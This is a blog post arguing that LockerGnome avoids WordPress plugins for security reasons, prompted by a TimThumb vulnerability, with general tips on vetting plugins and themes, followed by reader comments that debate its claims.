Why LockerGnome Doesn’t Rely On WordPress Plugins

Why LockerGnome Doesn't Rely On WordPress PluginsThe Register is reporting about a new “Zero Day” vulnerability in WordPress installs that run TimThumb. LockerGnome wasn’t at risk, because we hate WordPress Plugins. That isn’t to say we are completely plugin free; it is hard to have a WordPress install without the SiteMap plugin. But other than that, we are pretty much plugin free.

Whenever we do work with plugins, we end up rewriting them. This doesn’t always make them more secure, but it does make them different. While people knock “security through obscurity,” you can’t be hacked via a bot that just tries known exploits over and over if your site runs a non-standard version of the software. So at least when we get hacked it will be by someone who genuinely hates us rather than someone who wants to sell herbal Viagra.

TimThumb is actually one of the plugins we actively avoid. Not because we knew it was faulty, but because we didn’t really want to read every line of code to find out it wasn’t.

In general, the things to look for in plugins to make sure you aren’t getting a bad one include:

Avoid anything that uses CURL to a domain you don’t trust; the same goes for FOPEN.

Don’t run anything that uses the “EVAL” function, as it executes code from strings, and this is an easy place for attacks.

Don’t run anything that auto updates. Despite the convenience, auto updating code can go from good to bad overnight. This puts you at risk.

Don’t run anything that adds or intercepts upload capabilities. (TimThumb, for example) Most things that just run and don’t take uploads — or “dial home” — can’t do things that are that bad. There are exceptions, but for the most part, if the plugin’s code lives in a little box, it can’t hurt you.

With WordPress, it’s not just plugins that can bite you. Lots of themes have a “Functions.php” that adds to WordPress functionality. This is a very common place for hackers to bury code that gives them a back door to your site. This is really a problem WordPress brings upon itself. WordPress doesn’t have themes or templates — it has APIs that people have built pages around. A theme would work more like a Mad Libs. Today is <date>. This is my post titled <title> <post>. But that isn’t how WordPress themes work; they are “do code.” Here is some stuff that doesn’t change “do more code” and in the middle of what seems like a perfectly benign bit of template can be something that says “if Amazon link, replace affiliate ID” or “add invisible link to porn site.”

I don’t even agree with Google’s Web master tools sending “update your WordPress” announcements. I like to know that my software won’t explode. Lots of people got tripped up on the 2.3.1 upgrade that required that all your posts be UTF8 or they showed random weird characters. That isn’t so great for SEO or user experience.

The really short version is: if you don’t read every line of code, you don’t know what is broken. If you don’t change a few bits here and there, you also are as vulnerable as everyone else.

  • Anonymous

    TimThumb is the worst piece of crap ever. If you are trying to use a CDN to cache images it won’t work with TimThumb because the script has to run anyways and it creates its own local image.

    Also, if you’re running a high traffic website, that plugin with be the downfall of it because it puts so much stress on the server. Best bet is just to use the build in thumbnail utility for WordPress.

  • http://blog.discoveringstyle.com BlueCockatoo

    I have recently got into writing plugins for my WordPress blog and am pretty impressed and pleased with the functionality available through their API. I can also see how it could be abused. It is a shame that we have to worry about it like that, especially because many people just don’t have the skills or patience to learn the skills they need to build their own plugins so have to rely on what’s offered that others have written.

    Honestly, you are lucky, Chris, that you and your staff can do what needs to be done with your WP installations, because most people just can’t… It’s easy to say “don’t use any plugins you didn’t write/inspect yourself”, but just not practical for the majority of bloggers who are non-technical. Not sure what a viable alternative is, though. :(

  • http://twitter.com/jeffnorris J Norris

    Don’t blame the plugins, or the platform. Blame the admin that trusts a plugin, a add-in , a script kitty and implements it on their blog. WordPress has a great community, and when a vulnerabilities is found they are quick the take action, this of course is when its in the ‘core’ code and not 3rd party add-ins.

    That being said the number of plug-in that phish, or are dangerous to run are few and far between. I have heard Chris say that his site is so shimmed together that it is kludge. This is do to have many developers piece things together, not document it, or make mistakes. Again not to blame the platform, but the developer and ultimately the user of the platform itself. If don’t like it, change it after all it is opensource.

  • Derek Harding

    “you can’t be hacked via a bot that just tries known exploits over and over if your site runs a non-standard version of the software”

    Sorry but this is simply not true. Unless your changes break specific functionality required by the exploit (not something that’s guaranteed) you will still be vulnerable.

    Ultimately this problem exists for any open, extensible system. The solutions are either
    a. Severely restrict the extensibility so nothing dangerous can be done or
    b. Validate every extension before it’s allowed to be used ala itunes store.

  • Anonymous

    So what do the small biz owners who are NOT nerds and/or have no time do? Where are the folks we can hire who can do a test on our sites and tell us what plug ins are “bad”

  • http://sunnyis.me/ Sunny Singh

    It really is the responsibility of the site owner/manager. Sure there are many faulty and insecure plugins out there, but you shouldn’t freely install every plugin that you find “cool” and expect everything to be okay. Take a look at the ratings, reviews, and ask yourself whether installing it is really needed. Most of the functionality of plugins I find people installing can be usually achieved with raw code, and it’s understandable that not everyone is a developer but it’s better to know what you’re doing before finding out that you’ve been hacked.

    It’s also usually never WordPress’s fault, the staff take security very seriously and work fast to fix bugs and holes and then release an update. It is up to you, however, to make sure that you are using the latest version of WordPress and installed plugins, and that you’ve done at least some maintenance checkups.

    Just a quick tip though, instead of installing a plugin see if you can edit the template files yourself to embed something like sharing buttons via a service like AddThis. A plugin automates the embedding of code within your site, but if you do it manually you will have more control and trust over what you have running.

  • http://twitter.com/UnchartedRadio Alistair Barnett

    TimThumb is not a WordPress Plugin, it’s a script. It’s not like anyone can just install and activate it like a normal plugin. Only someone who knows what they’re doing will be able to implement it, but of course someone could be using a theme that has built-in support for it. In either case, it’s simple enough to replace or fix the code when a vulnerability is known.

    Also, shouldn’t LockerGnome be using the latest version of WordPress? Yes, I realize that certain plugins (even though you hate them) may not be compatible and the UTF8 requirement is annoying, but you’re taking a huge risk by not having the latest security and bug fixes.